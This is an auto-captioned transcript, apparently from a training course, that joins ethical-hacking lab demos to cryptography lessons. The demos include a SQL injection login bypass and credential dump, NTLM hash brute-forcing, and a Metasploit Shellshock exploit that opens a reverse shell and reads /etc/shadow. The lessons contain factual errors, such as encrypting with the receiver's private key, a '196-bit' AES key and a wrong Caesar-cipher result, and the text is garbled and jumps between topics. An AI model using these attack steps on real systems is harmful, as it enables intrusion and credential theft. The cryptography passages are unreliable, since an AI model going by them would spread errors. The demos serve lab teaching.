They are legit or not and if i find some suspicious or doubtful i’m going to block that connection and then i’m going to investigate what’s going on and that’s where ethical hacking comes into the picture you want to find out if your firewall that you have implemented is
Going to work correctly or not if the configuration of the firewall is done properly or if the firewall is misconfigured is it leaking out information right at the same time you’re looking at web applications we looked at the ovas broken web application where we did some sql
Injection attacks right so that was a weakness or a vulnerability in that application which would allow us to bypass authentication and get access to resources that we were not authorized for and then client-side attack should be where you install keylogger at the end of the
At the client system and then you try to capture whatever data the user is typing in like usernames and passwords on the facebook and the rediff mail.com website that we saw and then try to misuse that information to get access to those resources then wi-fi networks right
Wi-fi is something that we use on a regular basis we got our smart devices nowadays smartphones tablets phablets that we can connect to wi-fi and start using all our services our banking applications on our smartphones and thus we want to ensure that wireless connectivity is simple and is secured so
You want to use encryption mechanisms you want to use tools on your smartphones anti-viruses firewalls on your smartphones to ensure that whatever you are utilizing is going to remain secure and then social engineering we’ve looked at the phishing website on facebook.com we’ve seen how easy it is to clone websites and
Host them on apache server so if you look at it from an ethical hacker’s perspective the job of ethical hacker is to simulate these kind of attacks that the hacker may conduct and first of all you’re basically going to find out areas where these attacks can happen think of it from a hacker’s
Perspective try to simulate those attacks and see if those attacks are going to be effective can those attacks be prevented and can your current security controls that you have put in place identify detect and prevent these attacks from happening in the first place and that is what ethical hacking
Is all about let’s look at the metasploit attack metasploit is a framework of penetration testing that makes hacking very simple you just need to know how to utilize the tool you need to identify the vulnerability associated with a particular exploit and then run the exploit on metasploit we’ll be
Demoing this during the practical so there are active exploits and passive exploits inactive exploits exploits a specific computer runs until execution and then exits uses brute force and exits when an error occurs in a passive exploit these exploits wait for incoming requests and exploit them as soon as
They connect they can also be used in conjunction with emails and web browsers so in passive exploits we create a payload we like a reverse connection payload we send it to the victim once the victim installs that software the machine will then initiate a connection
To us our machine will be in a listen mode and then we will once the software is executed at there and we would then try to connect and exploit that particular vulnerability this is the practical that we’ll be doing on metasploit so let’s move on with the
Demos and then we’ll see what we can discuss amongst them all right let’s have a look at some of the demos that we had talked about in the ethical hacking and penetration testing module we are going to look at three different demos the first one is going to be a sql
Injection attack that we are going to perform on this tool that we have the second one is a password cracking attack on windows 7 and the third one is a meter breeder based or a metasploit based shell shock attack on a linux based web server so let’s get cracking
I’ve powered on this virtual machine uh which is the ovas broken web application it is a tool that is provided for people who want to enhance their skills and they can practice how to do these attacks in a legal manner so we are going to go to this
Site i’m just going to open up my browser the ip address is 71.132 and that’s the ovas broken web application that we want to utilize we are going to head off to mutilate a2 and we are going to look at a sql injection attack where we want to bypass
Authentication now this takes us to the login screen so we can just try unlock here and see that the authentication mechanism works the account does not exist so the username and password that we have supplied is not the correct one so we want to ensure that there’s a sql
Database and we can try to attack it and see if we can bypass the authentication now uh what we want to do is we want to create a sql based malform query that can give us a different output so i’m just going to type in a single quote
Over here and type login and you can see that this is now suddenly recognized as a operator and there’s an error that is given out compared to the login that we tried earlier when we used a proper text based login mechanism it gave us the account does not exist but here the
Signal code gave us a error and it shows us how sql works this is the query that we had created now in the trainings that you have for ethical hacking there would be explanations of what this queries are all about how the syntax works here
We’re just going to see if we can create a malform query to log in as a user in this case so what i’m going to do is uh create the query over here we’re going to give it a comparison so we’re going to give it a r one equals one space
Hyphen hyphen space and if you now click login you should be able to bypass authentication and you can see user has been authenticated and we now have admin access to this application now here the sql queries need to be crafted in such a perspective that they’re going to work
So there would be a lot of exercise in identifying what the database is there’s a microsoft database an oracle database and so on so forth and then you have to choose those proper commands but identifying that would come in the training right now we’re just looking at
At a demo this is how a sql injection attack works now let me log out here similarly now we are in a login page the same query worked wonders where it allowed us to bypass authentication so it also depends on what kind of a page i
Am and what query would be accepted at this point in time so here application understanding would also come into the picture where uh which function we are calling upon when we are connected to a particular page now this is a user lookup function right so again here we
Try the same method test test that’s not going to work authentication error bad user or password and if we type in the same query over here single quote or and give it a condition single quote or one equals one space hyphen knife in space
Now here it is not going to log us in because this is not a login page this is a user lookup form so here it will instead give us a dump of all the databases that it has so you can see all the usernames and passwords coming in
That are stored in the user lookup field so this is where the understanding comes in of which query to create at what page we are depending upon the function that is being called right so that’s the sql uh injection attack that we wanted to look at let’s move on to password
Tracking now this is a windows 7 machine that we have i’m just going to do a very basic password tracking example we’re just going to log in now here the assumption is that we are able to log in we have access to a computer and we want
To check out other users who are using this computer and see if we can find out their passwords so that uh we can log in as a different user steal data if required and we wouldn’t be to blame if there are any locks that are created so
Here we’ve got a tool called k enable that is installed right here now i’m already an administrator on this machine and checking out other administrators who share the same privileges or any other user who may be on this system whose password i can crack and does i
Would be able to get access through their account and then do any malicious activity right so this allows me to go into a cracker tool and it allows me to enumerate this machine and identify all the users and passwords that are there in this particular machine right so i’m
Just going to click on the plus sign and i’m going to import hashes from a local system so where are these files stored where does windows store its passwords in what format are they stored and what this tool does to retrieve those that’s something that we all need to know as
Ethical hacker right so import the hashes from local system click on next it’s going to enumerate that file and it is going to give you a list of all the users that are there so you can see the users are hacker admin test the one that
We are logged in as and then the user called virus as well and you can see that this is the hash value of the password that is being utilized now there’s a particular format for the hash value for windows and how it stores but once we have these hash values let’s say
If i want to crack this password there are various attacks that we can do for example a dictionary based attack or a brute force attack let’s try a brute force attack right ntlm is the hashing mechanism that is used by windows so we’re going to try to create an ntlm
Hash attack and here we are going to use a predetermined rule set for example we are not sure what characters are being utilized over here so we just create an attack like this using all characters and uh lowercase a through z uppercase a through z numeric zero through nine and
All the special characters let’s say that password is between seven and 16 characters and this is the character set that we want to try the brute force attack on what is a brute force attack it is an attack where the computer is going to try each and every permutation
And combination out of this character set and try to figure out if the password is going to be correct so if we click start it’s going to start with a particular characters and then it is going to identify if that ntlm hash is going to work against this character and
You can see the time is going to be phenomenal over here so it’s not necessary that this attack would be viable it will be 100 successful given the time frame however the time frame is huge enough for this attack to become a little bit redundant there are other
Attacks that we can do which can easily identify this data for us as well but that is something that we will look on in future videos so that’s how you can get access to users and passwords uh there are different mechanisms where let’s say we don’t have login access
Then what are we going to do how we can create a fake user login or how we can remotely access a machine and then try to get the same access and that is what we are going to try to do in the next demo on a linux machine so what we are
Doing in a linux machine could also be doable on the windows machine with a different exploit so what i’m going to do is this is the linux web server that i have that i’m going to power on i’m going to use a kali linux machine to
Hack that device and i’m going to just power off my windows 7 machine give it a minute till it boots up now this is also a demo machine that we have which has its own pre-configured vulnerabilities so here we’ve got something from the pentester’s lab and has a shell shock vulnerability
Implemented inside shell shock vulnerability affects linux mac and unix-based operating systems for a particular version of the bash shell bash is the bone again shell which is the command line interface in these operating systems so what we are trying to do here is we are going to use the kali linux
Machine try to find out the vulnerability over here and if it exists we are going to use metasploit to attack this machine now the first and foremost thing is we want to identify the ip address we have no idea what the ip address is we are in the same subnet so
We are assuming that we are able to connect to this machine so what i am going to do is i’m going to open up a tool called zenmap i’m going to open up a command line interface find out what my ip address is and my appearance is
This with a subnet mask of 255 255 255.00 so i want to see if there are any other machines that are live in the same subnet and we are doing a ping swipe over here to identify which machines are live in a minute we’ll get all the ip
Addresses 71.1 to 133 254 and 120 we know that we are 128 at this point in time uh 254 is the dhcp server so we are assuming that 133 is the machine that we want to look at and let’s then try to see if we can scan that machine 133 and
We’re going to do an intense scan to find out which ports are open what services are running over there and if it is whether the pintest machine that we were looking for you can see of the start port 22 and port 80 and somewhere here it’s going to give us the
Ports that are open and the details about those ports and somewhere here it will tell us that this is the pentester lab machine that we wanted which is correct so now we want to do a vulnerability analysis on this what we are going to do is i’m going to use
Another gui based tool called sparta which i can just find out from here sparta uses two tools in the background uh nmap tool and a tool called nikto so we’re just going to start scanning 192 168 71.133 was the ip address add to scope and over a period of time you can see
All of these will start populating with information there we are that’s the nikto tool coming in scanning on port 80 which is uh which means that it’s a web server using http it tells us it’s an apache http 2.2.21 and that gives us the 22 port number as
Well if we head over to the tab of nicto or let’s look at the screenshot first this is what the website would be looking like and nicto gives us the options over here it tells us that there is a vulnerability over here for shell shock and this is the part where the
Vulnerability is going to exist so what we are going to do we go back to the command line sorry we open up a new one minimize all these other windows and we are going to open up metasploit metasploit is a penetration testing tool that is used by most hackers and ethical
Hackers to test applications and test existing exploits and vulnerabilities so just give it a minute till it starts you can see there are already around 1700 exploits right here uh we’re going to see all those exploits with these commands there we are sorry for the typo
And it will just give us a list of all the exploits that are stored in metasploit in this version so all of these are windows based if we scroll up we will be looking at other vulnerabilities as well or exploits the unique space exploits linux osx multi-exploits and we’re looking for a
Exploit for um multi-based apache or http let’s go up let’s look at so this is the one that we’re looking for apache mod cgi bash environmental executable so what we’re going to do is we’re just going to copy it go back to the bottom say use exploit and paste the one that
We wanted press enter say show options so it will ask us to configure this i’m just going to configure it based on the knowledge that we have set our host which is the remote host the victims machine so we put in the ip address it asks us for the target
Uri so that’s the path that we saw set target uri to cgi hyphen bin slash status enter now with exploit we need to find a payload that is going to give us the output that we want so we say show payloads and it will give us a list of all the
Compatible payloads with this exploit and we want to create a reverse tcp connection which is this so we know it’s a linux operating system we want this uh payload to be set so set payload press enter that’s the payload coming in show options now that we have set the payload
This is the options for the exploit and now we want to set our options for the payloads as well so we are creating a reverse tcp connection which means we are remotely executing code at the victim side and making the victim connect back to our machine which means
We need to set up a listener so i need to put my ip address over here set localhost or lhost 192.168.71.128 which was our ip address show options again just to ensure everything is fine which looks like it is and we then type in the word exploit
So that it will start this attack i can see that it has created a mutable session at the victim site and it has opened up a session so if i do a pwd now pwd is a linux command for present working directory and it will show us
That we’ll connect it to where w cgi hyphen bin do an ls it will list all the files that’s the status file over there do a cd backslash it will take us to the root of this machine now remember we saw the passwords on a windows machine
Similarly we can head over to the cd etc folder ls and you can see these files psswd and shadow now psswd is the file where linux stores its usernames and shadow is the file where passwords are shown so do a cat command psswd and you
Can see these users coming up so you can see the last user pen test lab and you can see there are no passwords so let’s do a cat shadow and that’s your hash value for the password that we have for the user print test lab so these are the
Different attacks that we need to understand uh and we need to create based on the vulnerabilities that exist on different machines so we just looked at windows and linux and how we can exploit them depending on existing vulnerabilities as an ethical hacker this is uh what we need to learn in our
Trainings and then we need to clear our exams based on this knowledge of how these things work so that we get certified and then we can position ourselves for the penetration testing jobs with the rise in censorship and general fear over privacy loss consumer security is at an all-time high risk
Technology has made our life so much easier while putting up a decent target on our personal information it is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments maintaining this balance has become easier with cryptography taking its place in today’s
Digital world so here’s a story to help you understand cryptography meet anne and wanted to look for a decent discount on the latest iphone she started searching on the internet and found a rather shady website that offered a 50 discount on the first purchase once and submitted her payment details a
Huge chunk of money was withdrawn from a bank account just moments after devastated and quickly realized she had failed to notice that the website was a http web page instead of an https one the payment information submitted was not encrypted and it was visible to anyone keeping an eye including the
Website owner and hackers had she used a reputed website which has encrypted transactions and employs cryptography our iphone enthusiast could have avoided this particular incident this is why it’s never recommended to visit unknown websites or share any personal information on them let’s now understand what cryptography is cryptography is the science of
Encrypting or decrypting information to prevent unauthorized access we transform our data and personal information so that only the correct recipient can understand the message as an essential aspect of modern data security using cryptography allows the secure storage and transmission of data between willing parties encryption is a primary route for
Employing cryptography by adding certain algorithms to jumble up the data decryption is the process of reversing the work done by encrypting information so that the data becomes readable again both of these methods form the basis of cryptography for example when simply learn is jumbled up or changed in any format not many
People can guess the original word by looking at the encrypted text the only ones who can are the people who know how to decrypt the coded word thereby reversing the process of encryption any data pre-encryption is called plain text or clear text to encrypt the message we use certain
Algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools these algorithms are called ciphers they are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver
We take the plain text pass it to the cipher algorithm and get the encrypted data this encrypted text is called the ciphertext and this is the message that is transferred between the two parties the key that is being used to scramble the data is known as the encryption key
These steps that is the cipher and the encryption key are made known to the receiver who can then reverse the encryption on receiving the message unless any third party manages to find out both the algorithm and the secret key that is being used they cannot decrypt the messages since both of them
Are necessary to unlock the hidden content wonder what else we would lose if not for cryptography any website where you have an account can read your passwords important emails can be intercepted and their contents can be read without encryption during the transit more than 65 billion messages are sent on whatsapp every day
All of which are secured thanks to end to end encryption there is a huge market opening up for cryptocurrency which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure if this is of particular interest to you you can watch our video on
Blockchain the link of which will be in the description of course there is no single solution to a problem as diverse as explained there are three variants of how cryptography works and is in practice they are symmetric encryption asymmetric encryption and hashing let’s find out how much we have understood until now
Do you remember the difference between a cipher and ciphertext leave your answers in the comments and before we proceed if you find this video interesting make sure to give it a thumbs up before moving ahead let’s look at symmetric encryption first symmetric encryption uses a single key for both the encryption and decryption
Of data it is comparatively less secure than asymmetric encryption but much faster it is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable this type of encryption is used when data rests on servers and identifies personnel for payment applications and
Services the potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key and it should be kept hidden at all times caesar cipher enigma machine are both symmetric encryption examples that we will look into further for example
If alice wants to send a message to bob she can apply a substitution cipher or a shift cipher to encrypt the message but bob must be aware of the same key itself so he can decrypt it when he finds it necessary to read the entire message symmetric encryption uses one of
The two types of ciphers stream ciphers and block ciphers block ciphers break the plain text into blocks of fixed size and use the key to convert it into ciphertext stream ciphers convert the plaintext into ciphertext one bit at a time instead of resorting to breaking them up into bigger chunks
In today’s world the most widely used symmetric encryption algorithm is aes 256 that stands for advanced encryption standard which has a key size of 256 bit with 128 bit and 196 bit key sizes also being available other primitive algorithms like the data encryption standard that is the des the triple data
Encryption standard 3des and blowfish have all fallen out of favor due to the rise of aes aes chops ups the data into blocks and performs 10 plus rounds of obscuring and substituting the message to make it unreadable asymmetric encryption on the other hand has a double whammy at its disposal
There are two different keys at play here a public key and a private key the public key is used to encrypt information pre-transit and a private key is used to decrypt the information post transit if alice wants to communicate with bob using asymmetric encryption she encrypts the message using bob’s public key
After receiving the message bob uses his own private key to decrypt the data this way nobody can intercept the message in between transmissions and there is no need for any secure key exchange for this to work since the encryption is done with the public key and the decryption is done with a
Private key that no one except bob has access to both the keys are necessary to read the full message there is also a reverse scenario where we can use the private key for encryption and the public key for decryption a server can sign non-confidential information using its private key and
Anyone who has its public key can decrypt the message this mechanism also proves that the sender is authenticated and there is no problem with the origin of the information rsa encryption is the most widely used asymmetric encryption standard it is named after its founders revest shamir and edelman and it uses block ciphers
That separate the data into blocks and obscure the information widely considered the most secure form of encryption albeit relatively slower than aes it is widely used in web browsing secure identification vpns emails and chat applications with so much hanging on the key secrecy there must be a way to transmit the keys
Without others reading our private data many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time since asymmetric encryption takes longer to decrypt large amounts of data the full information is encrypted using a single key that is symmetric encryption
That single key is then transmitted to the receiver using asymmetric encryption so you don’t have to compromise either way another route is using the diffie-hellman key exchange which relies on a one-way function and is much tougher to break into the third variant of cryptography is termed as hashing
Hashing is the process of scrambling a piece of data beyond recognition it gives an output of fixed size which is known as the hash value of the original data or just hash in general the calculations that do the job of messing up the data collection form the hash function
They are generally not reversible without resilient brute force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text for example many websites store your account passwords in a hashed format so that not even the administrator can read your credentials
When a user tries to log in they can compare the entered passwords hash value with the hash value that is already stored on the servers for authentication since the function will always return the same value for the same input cryptography has been in practice for centuries julius caesar used a substitution shift
To move alphabets a certain number of spaces beyond their place in the alphabet table a spy can’t decipher the original message at first glance for example if he wanted to pass confidential information to his armies and decides to use the substitution shift of plus 2 a
Becomes c b becomes d and so on the word attack when passed through a substitution shift of plus three becomes d w d e f n this cipher has been appropriately named the caesar cipher which is one of the most widely used algorithms the enigma is probably the most famous
Cryptographic cipher device used in ancient history it was used by the nazi german armies in the world wars they were used to protect confidential political military and administrative information and it consisted of three or more rotors that scrambled the original message depending on the machine state at that
Time the decryption is similar but it needs both machines to stay in the same state before passing the ciphertext so that we received the same plain text message let’s take a look at how our data is protected while we browse the internet thanks to cryptography here we have a
Web-based tool that will help us understand the process of rsa encryption we see the entire workflow from selecting the key size to be used until the decryption of the cipher text in order to get the plain text back as we already know rsa encryption algorithm falls under the umbrella of asymmetric key cryptography
That basically implies that we have two keys at play here a public key and a private key typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message there are some occasions when this
Allocation is reversed and we will have a look at them as well in rsa we have the choice of key size we can select any key from a 512 bit to 1024 bit all the way up to a 4096 bit key the longer the key length the more complex the encryption process becomes
And thereby strengthening the cipher text although with added security more complex functions take longer to perform the same operations on similar size of data we have to keep a balance between both speed and strength because the strongest encryption algorithms are of no use if they cannot be practically
Deployed in systems around the world let’s take a 1024 bit key over here now we need to generate the keys this generation is done by functions that operate on pass phrases the tool we are using right now generates this pseudo random keys to be used in this explanation
Once we generate the keys you can see the public key is rather smaller than the private key which is almost always the case these two keys are mathematically linked with each other they cannot be substituted with any other key and in order to encrypt the original message or decrypt the cipher
Text this pair must be kept together the public key is then sent to the sender and the receiver keeps the private key with himself in this scenario let’s try and encrypt a word simply learn we have to select if the key being used for encryption is either private or
Public since that affects the process of scrambling the information since we are using the public key over here let’s select the same and copy it and paste over here the cipher we are using right now is plain rsa there are some modified ciphers with their own pros and cons
That can also be used provided we use it on a regular basis and depending on the use case as well once we click on encrypt we can see the ciphertext being generated over here the pseudorandom generating functions are created in such a way that a single character change in the plaintext will
Trigger a completely different ciphertext this is a security feature to strengthen the process from brute force methods now that we are done with the encryption process let’s take a look at the decryption part the receiver gets this cipher text from the sender with no other key or supplement
He or she must already possess the private key generated from the same pair no other private key can be used to decrypt the message since they are mathematically linked we paste the private key here and select the same the cipher must always so be the same used during the encryption process
Once we click decrypt you can see the original plain text we had decided to encrypt this sums up the entire process of rsa encryption and decryption now some people use it the other way around we also have the option of using the private key to encrypt information
And the public key to decrypt it this is done mostly to validate the origin of the message since the keys only work in pairs if a different private key is used to encrypt the message the public key cannot decrypt it conversely if the public key is able to decrypt the
Message it must have been encrypted with the right private key and hence the rightful owner here we just have to take the private key and use that to encrypt the plain text and select the same in this check box as well you can see we have generated a completely new cipher text
This cipher text will be sent to the receiver and this time we will use the public key for decryption let’s select the correct checkbox and decrypt and we still get the same output now let’s take a look at practical example of encryption in the real world
We all use the internet on a daily basis and many are aware of the implications of using unsafe websites let’s take a look at wikipedia here pretty standard https website where the h stands for secured let’s take a look at how it secures that data wireshark is the world’s foremost and
Most widely used network protocol analyzer it lets you see what’s happening on your network at a microscopic level and we are going to use the software to see the traffic that is leaving a machine and to understand how vulnerable it is since there are many applications running in this machine let’s apply a
Filter that will only show us the results related to wikipedia Let’s search for something that we can navigate the website with okay once we get into it a little you can see some of the requests being populated over here let’s take a look at the specific request these are the data packets that basically transport the data from our
Machine to the internet and vice versa as you can see there’s a bunch of gibberish data here that doesn’t really reveal anything that we searched or watched similarly other secured websites function the same way and it is very difficult if at all possible to snoop on user data this way
To put this in perspective let’s take a look at another website which is a http web page this has no encryption enabled from the server end which makes it vulnerable to attacks there is a login form here which needs legitimate user credentials in order to grant access
Let’s enter a random pair of credentials these obviously won’t work but we can see the manner of data’s transfer unsurprisingly we weren’t able to get into the platform instead we can see the data packets let’s apply a similar filter that will help us understand what request this website is sending
These are the requests being sent by the http login form to the internet if we check here see whatever username and password that we are entering we can easily see it with the wireshark now we used a dummy pair of credentials if we select the right data packet we
Can find our correct credentials if any website had asked for a payment information or a legitimate credentials it would have been really easy to get a hold of these to reiterate what we have already learned we must always avoid http websites and just unknown or not trustworthy websites in general because
The problem we saw here is just the tip of the iceberg even though cryptography has managed to lessen the risk of cyber attacks it is still prevalent and we should always be alert to keep ourselves safe online there are two types of encryption in cryptography symmetric cryptography and asymmetric key cryptography
Both of these categories have their pros and cons and differ only by the implementation today we are going to focus exclusively on symmetric key cryptography let us have a look at its applications in order to understand its importance better this variant of cryptography is primarily used in banking applications where personally identifiable
Information needs to be encrypted with so many aspects of banking moving on to the internet having a reliable safety net is crucial symmetric cryptography helps in detecting bank fraud and boosts the security index of these payment gateways in general they are also helpful in protecting data
That is not in transit and dress on servers and data centers these centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm so that when the data needs to be recalled by the respective service there is the assurance of minor to no delay
While browsing the internet we need symmetric encryption to browse secure https websites so that we get an all around protection it plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security this helps us in preventing the rather
Insecure http website format so let us understand how symmetric key cryptography works first before moving on to the specific algorithms symmetric key cryptography relies on a single key for the encryption and decryption of information both the sender and receiver of the message need to have a pre-shared secret
Key that they will use to convert the plain text into ciphertext and vice versa as you can see in the image the key used for encryption is the same key needed for decrypting the message at the other end the secret key shouldn’t be sent along with the cipher text to the
Receiver because that would defeat the entire purpose of using cryptography key exchange can be done beforehand using other algorithms like the diffie-hellman key exchange protocol for example for example if paul wants to send a simple message to jane they need to have a single encryption key that both of
Them must keep secret to prevent snooping on by malicious actors it can be generated by either one of them but must belong to both of them before the messages start flowing suppose the message i am ready is converted into ciphertext using a specific substitution cipher by paul in
That case jane must also be aware of the substitution shift to decrypt the ciphertext once it reaches her irrespective of the scenario where someone manages to grab the ciphertext mid-transit to try and read the message not having the secret key renders everyone helpless looking to snoop in the symmetric key algorithms like the
Data encryption standard have been in use since the 1970s while the popular ones like the ees have become the industry standard today with the entire architecture of symmetric cryptography depending on the single key being used you can understand why it’s of paramount importance to keep it secret on all occasions
The side effect of having a single key for the encryption and decryption is it becomes a single point of failure anyone who gets their hand on it can read all the encrypted messages and do so mainly without the knowledge of the sender and the receiver so it is the priority to keep the
Encryption and encryption key private at all times should it fall into the wrong hands the third party can send messages to either the sender or the receiver using the same key to encrypt the message upon receiving the message and decrypting it with the key it is impossible to guess its origin
If the sender somehow transmits the secret key along with the cipher text anyone can intercept the package and access the information consequently this encryption category is termed private key cryptography since a big part of the data’s integrity is riding on the promise that the users can keep the key secret this terminology
Contrasts with asymmetry key cryptography which is called public key cryptography because it has two different keys at play one of which is public provided we managed to keep the key secret we still have to choose what kind of ciphers we want to use to encrypt this information in symmetric key cryptography there are
Broadly two categories of ciphers that we can employ let us have a look stream ciphers are the algorithms that encode basic information one bit at a time it can change depending on the algorithm being used but usually it relies on a single bit or byte to do the encryption
This is the relatively quicker alternative considering the algorithm doesn’t have to deal with blocks of data at a single time every piece of data that goes into the encryption can and needs to be converted into binary format in stream ciphers each binary digit is encrypted one after the other
The most popular ones are the rc4 salsa and panama the binary data is passed through an encryption key which is a randomly generated bit stream upon passing it through we receive the ciphertext that can be transferred to the receiver without fear of man in the middle attacks
The binary data can be passed through an algorithmic function it can have either x or operations as it is most of the time or any other mathematical calculations that have the singular purpose of scrambling the data the encryption key is generated using the random bitstream generator and it
Acts as a supplement in the algorithmic function the output is in binary form which is then converted into the decimal or hexadecimal format to give our final ciphertext on the other hand block ciphers dissect the raw information into chunks of data of fixed size the size of these blocks depends on the
Exact cipher being used a 128-bit block cipher will break the plain text into blocks of 128 bit each and encrypt those blocks instead of a single digit once these blocks are encrypted individually they are chained together to form a final cipher text block ciphers are much slower but they
Are more tamper-proof and are used in some of the most widely used algorithms employed today just like stream ciphers the original ciphertext is converted into binary format before beginning the process once the conversion is complete the blocks are passed through the encryption algorithm along with the encryption key this would provide us
With the encrypted blocks of binary data once these blocks are combined we get a final binary string this string is then converted into hexadecimal format to get a ciphertext today the most popular symmetric key algorithms like aes des and 3des are all block cipher methodology subsets with so many factors coming into play
There are quite a few things symmetrically cryptography excels at while falling short in some other symmetric key cryptography is much faster variant when compared to asymmetric key cryptography there is only one key in play unlike asymmetric encryption and this drastically improves calculation speed in the encryption and decryption similarly the performance of symmetric
Encryption is much more efficient under similar computational limitations fewer calculations help in better memory management for the whole system bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms since they are much quicker handling large amounts of data is simple and easy to use in servers and
Data forms this helps in better latency during data recall and fewer mixed packets thanks to its simple single key structure symmetric key cryptography algorithms are much easier to set up a communication channel with and offer a much more straightforward maintenance duties once the secret key is transmitted to both the sender and
Receiver without any prior mishandling the rest of the system aligns easily and everyday communications becomes easy and secure if the algorithm is applied as per the documentation symmetric algorithms are very robust and can encrypt vast amounts of data with very less overhead in a last video on
Cryptography we took a look at symmetric key cryptography we used a single private key for both the encryption and decryption of data and it works very well in theory let’s take a look at a more realistic scenario now let’s meet joe joe is a journalist who needs to
Communicate with ryan via long distance messaging due to the critical nature of the information people are waiting for any message to leave joe’s house so that they can intercept it now joe can easily use symmetric key cryptography to send the encrypted data so that even if someone intercepts the
Message they cannot understand what it says but here’s the tricky part how will joe send the required decryption key to ryan the sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages otherwise ryan cannot decrypt the information even when he receives
The cipher text if someone intercepts the key while transmitting it there is no use in employing cryptography since a third party can now decode all the information easily key sharing is a risk that will always exist when symmetric key cryptography is being used thankfully asymmetric key encryption has managed to fix this problem
Let’s understand what asymmetric key cryptography is asymmetric encryption uses a double layer of protection there are two different keys at play here a private key and a public key a public key is used to encrypt the information pre-transit and a private key is used to decrypt the data post transit
These pair of keys must belong to the receiver of the message the public keys can be shared via messaging blog posts or key servers and there are no restrictions as you can see in the image the two keys are working in the system the sender first encrypts the message
Using the receiver’s private key after which we receive the cipher text the cipher text is then transmitted to the receiver without any other key on getting the ciphertext the receiver uses his private key to decrypt it and get the plain text back there has been no requirement of any key exchange
Throughout this process therefore solving the most glaring flaw faced in symmetry key cryptography the public key known to everyone cannot be used to decrypt the message and the private key which can decrypt the message need not be shared with anyone the sender and receiver can exchange
Personal data using the same set of keys as often as possible to understand this better take the analogy of your mailbox anyone who wants to send you a letter has access to the box and can easily share information with you in a way you can say the mailbox is
Publicly available to all but only you have access to the key that can open the mailbox and read the letters in it this is how the private key comes to play no one can intercept the message and read its contents since it’s encrypted once the receiver gets its contents he
Can use his private key to decrypt the information both the public key and the private key are generated so they are interlinked and you cannot substitute other private keys to decrypt the data in another example if alice wants to send a message to bob let’s say it reads call me today she
Must use bob’s public key while encrypting the message upon receiving the cipher message bob can proceed to use his private key in order to decrypt the message and hence complete securities attained during transmission without any need for sharing the key since this type of encryption is highly
Secure it has many uses in areas that require high confidentiality it is used to manage digital signature so there is valid proof of a document’s authenticity with so many aspects of business transitioning to the digital sphere critical documents need to be verified before being considered authentic and acted upon thanks to asymmetric cryptography
Senders can now sign documents with their private keys anyone who needs to verify the authenticity of such signatures can use the sender’s public key to decrypt the signature since the public and the private keys are linked to each other mathematically it’s impossible to repeat this verification wizard with duplicate keys
Document encryption has been made very simple by today’s standards but the background implementation follows the similar approach in blockchain architecture asymmetry key cryptography is used to authorize transactions and maintain the system thanks to its two key structures changes are reflected across the blockchain’s peer-to-peer network only if it is approved from both ends
Along with asymmetric key cryptography’s tamper-proof architecture its non-repudiation characteristic also helps in keeping the network stable we can also use asymmetric key cryptography combined with symmetrical cryptography to monitor ssl or tls encrypted browsing sessions to make sure nobody can steal our personal information when accessing banking websites or the internet in general
It plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security instead of the rather insecure http website format security parameters differ on a session by session basis so the verification process is consistent and
Utterly essential to modern data security another great use of the asymmetric key cryptography structure is transmitting keys for key cryptography with the most significant difficulty in symmetric encryption being key exchange asymmetric keys can help clear the shortcoming the original message is first encrypted using a symmetric key the key used for
Encrypting the data is then converted into the cipher text using the receiver’s public key now we have two cipher text to transmit to the receiver on receiving both of them the receiver uses his private key to decrypt the symmetry key he can then use it to decrypt the original
Information on getting the key used to encrypt the data while this may seem more complicated than just asymmetric cryptography alone symmetric encryption algorithms are much more optimized for vast amounts of data on some occasions encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure
You might remember us discussing why symmetric encryption was called private key cryptography let us understand why asymmetric falls under the public key cryptography we have two keys at our disposal the encryption key is available to everyone the decryption key is supposed to be private unlike symmetric key cryptography there
Is no need to share anything privately to have an encrypted messaging system to put that into perspective we share an email address with anyone looking to communicate with us it is supposed to be public by design so that our email login credentials are private and they help in preventing any data mishandling
Since there is nothing hidden from the world if they want to send us any encrypted information this category is called the public key cryptography there are quite a few algorithms being used today that follow the architecture of asymmetric cryptography none more famous than the rs encryption rsa encryption is the most widely used
Encryption or public key encryption standard using asymmetric approach named after its founders rivest shamir and edelman it uses block ciphers to obscure the information if you are unfamiliar with how block ciphers work there are encryption algorithms that divide the original data into blocks of equal size the block size depends on the exact
Cipher being used once they are broken down these blocks are encrypted individually and later chained together to form the final cipher text widely considered to be the most secure form of encryption albeit relatively slower than symmetric encryption algorithms it is widely used in web browsing secure identification vpns emails and other chat applications
With so many variables in play there must be some advantages that give asymmetrically cryptography an edge over the traditional symmetric encryption methodologies let’s go through some of them there is no need for any reliable key sharing channel in asymmetric encryption it was an added risk in private key cryptography that has been completely
Eliminated in public key architecture the key which is made public cannot recruit any confidential information and the only key that can decrypt doesn’t need to be shared publicly under any circumstance we have much more extensive key lengths in rsa encryption and other asymmetric algorithms like 2048 bits key and 4096 bit keys
Larger keys are much harder to break into via brute force and are much more secure asymmetric key cryptography can use as a proof of authenticity since only the rightful owner of the keys can generate the messages to be decrypted by the private key the situation can also be
Reversed encryption is done using a private key and decryption is done by the public key which would not function if the correct private key is not used to generate the message hence proving the authenticity of the owner it also has a tamper protection feature where the message cannot be intercepted
And changed without invalidating the private key used to encrypt the data consequently the public key cannot decrypt the message and it is easy to realize the information is not 100 legitimate when and where the case requires so importance of a cyber security certification first and foremost when i
See a certification i look at it from three different aspects the first is the training itself which allows me to gain the knowledge which allows me to understand the aspects of security or whatever the certification is there for the second aspect is the exam itself how
Do i need to prepare myself for the exam and how do i need to approach the exam how do i need to ensure that i pass in my first attempt and the third aspect is the certification itself which allows me to be eligible to apply for a particular
